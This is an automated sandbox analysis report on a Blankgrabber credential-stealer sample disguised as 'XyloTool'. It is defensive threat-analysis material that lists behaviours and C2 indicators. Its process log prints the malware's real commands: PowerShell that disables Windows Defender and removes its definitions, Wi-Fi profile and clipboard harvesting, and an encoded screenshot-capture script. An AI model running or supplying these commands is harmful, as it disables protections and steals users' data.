Analysis Overview
SHA256
79fe80b6762a5ee29c76185cd062fcf832deb1620f04ddc4de50d3358ca9373f
Threat Level: Known bad
The file XyloTool.rar was found to be: Known bad.
Malicious Activity Summary
Blankgrabber family
A stealer written in Python and packaged with Pyinstaller
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
UPX packed file
Reads user/profile data of web browsers
Loads dropped DLL
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Detects videocard installed
Gathers system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-22 19:00
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-22 19:00
Reported
2024-06-22 19:03
Platform
win7-20240220-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2872 wrote to memory of 2528 | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe |
| PID 2872 wrote to memory of 2528 | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe |
| PID 2872 wrote to memory of 2528 | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI28722\python310.dll
| MD5 | b93eda8cc111a5bde906505224b717c3 |
| SHA1 | 5f1ae1ab1a3c4c023ea8138d4b09cbc1cd8e8f9e |
| SHA256 | efa27cd726dbf3bf2448476a993dc0d5ffb0264032bf83a72295ab3fc5bcd983 |
| SHA512 | b20195930967b4dc9f60c15d9ceae4d577b00095f07bd93aa4f292b94a2e5601d605659e95d5168c1c2d85dc87a54d27775f8f20ebcacf56904e4aa30f1affba |
memory/2528-23-0x000007FEF5E90000-0x000007FEF62F5000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-22 19:00
Reported
2024-06-22 19:03
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI43562\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.0.782428414\768569740" -parentBuildID 20230214051806 -prefsHandle 1760 -prefMapHandle 1752 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {abdd5e5d-a614-4854-b40d-5c005b7f774a} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 1852 223b690c158 gpu
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.1.1458366632\1864088594" -parentBuildID 20230214051806 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {653780f5-6a4f-44d0-bc9c-a63052288364} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 2468 223a9c86558 socket
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.2.787937635\789137508" -childID 1 -isForBrowser -prefsHandle 3324 -prefMapHandle 3320 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce975ee2-25b4-422f-93a7-f426a8851135} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 3336 223b9421858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.3.1397786790\886112756" -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e87b9a6-8c93-49d9-8e24-eb6d32041b8b} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 3680 223bb1bb158 tab
C:\Windows\System32\Wbem\WMIC.exe
